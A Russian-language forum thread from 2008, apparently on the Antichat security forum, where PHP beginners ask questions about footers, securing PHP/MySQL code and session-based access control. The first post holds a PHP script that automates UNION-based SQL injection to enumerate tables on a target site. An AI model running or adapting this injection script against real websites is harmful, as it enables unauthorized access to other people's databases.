HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу [php] Новичкам: задаем вопросы
   
Ответ
Страница 312 из 1628 « Первая < 212262302 308 309 310 311 312 313 314 315 316 3223624128121312 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.05.2008, 17:17
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223

Репутация: 5
По умолчанию
Подскажите где ошибка, вроде всё правильно, но не находит существующие столбцы в MYSQL!
<?
@set_time_limit(0);
$strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.users+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m);
foreach($m[2] as $s){
}
$fd = fopen("kol.txt", "r");
while(!feof($fd)) {
$ma=trim(fgets($fd));
$str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.".$ma."+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p);
foreach($p[2] as $k){
}

if($s==$k){
echo "ok, exist";

}
else {
echo "error";

}
}
fclose($fd);
?>
 
Ответить с цитированием

  #2  
Старый 16.05.2008, 17:56
Корвин
Участник форума
Регистрация: 26.02.2007
Сообщений: 259
Провел на форуме:
302951

Репутация: 67
По умолчанию
PHP код:

foreach($m[2] as $s){
}

foreach($p[2] as $k){



а это так и должно быть что цикл открылся и сразу закрылся, не выполняя никаких действий??
 
Ответить с цитированием

  #3  
Старый 16.05.2008, 19:53
max_rebel
Постоянный
Регистрация: 18.10.2007
Сообщений: 461
Провел на форуме:
577061

Репутация: 66
По умолчанию
Привет всем
Подскажите пожалуйста как разместить <?php include("footer.inc");?> именно внизу страницы независимо от того сколько всякого на странице уже размещено - т.е. так чтоб футер всегд был только внизу страницы
спасибо
 
Ответить с цитированием

  #4  
Старый 16.05.2008, 20:37
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


По умолчанию
в самый конец кода вставляй....
 
Ответить с цитированием

  #5  
Старый 16.05.2008, 21:09
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223

Репутация: 5
По умолчанию
Корвин
Да, цыкл возвращает $k=4, тоесть раскрутка масива и получение значения!
 
Ответить с цитированием

  #6  
Старый 16.05.2008, 23:15
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию
Плиз дайте хорошую ссылку про то 'Как обезопасить свой код (РHP+Mysql)' короче наверн поняли.. .
 
Ответить с цитированием

  #7  
Старый 17.05.2008, 12:52
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Цитата:
Сообщение от Buffalon  
Плиз дайте хорошую ссылку про то 'Как обезопасить свой код (РHP+Mysql)' короче наверн поняли.. .
http://www.php.su/security/
+ моск))
 
Ответить с цитированием

  #8  
Старый 16.05.2008, 23:22
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
По умолчанию
2 Buffalon
http://bvisoft.com/reads/263.php
Вот почитай, используя mysqli можеш забыть про СКЛ-инъекты
А вот общее по безопасности, мне понравилось
http://www.1c-bitrix.ru/security/recommendations.php
 
Ответить с цитированием

  #9  
Старый 17.05.2008, 03:24
Zircool
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496

Репутация: 78
По умолчанию
Как осуществить авторизацию к определенным скриптам, на прямой доступ к скрипту что бы тебя отправляли на форму авторизации... Без использования .htpassw именно php скрипт... Приведите пож короткий пример, выжная часть вопроса, это как запретить доступ к опред скриптам...
 
Ответить с цитированием

  #10  
Старый 17.05.2008, 04:27
[504]
Новичок
Регистрация: 06.12.2005
Сообщений: 8
Провел на форуме:
35842

Репутация: 4
По умолчанию
например так:
В каждом скрипте пишем(или же пишем в одном отдельном файле, на котором потом include поставить)
Смотрим авторизован ли юзер(смотря посредством чего идет авторизация, у меня пример проверки сессии):
PHP код:
<?
session_start();
if (!isset($_SESSION['login'])){
   echo "Доступ запрещен. Авторизуйтесь";
   exit;
}else{
   //Тут можем сделать запрос в базу
   //Посмотреть имеет ли данный юзер доступ к скрипту
   //Естесственно, должна быть соответ. база
}
//далее сам скрипт
?>
 
Ответить с цитированием
Ответ
Страница 312 из 1628 « Первая < 212262302 308 309 310 311 312 313 314 315 316 3223624128121312 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.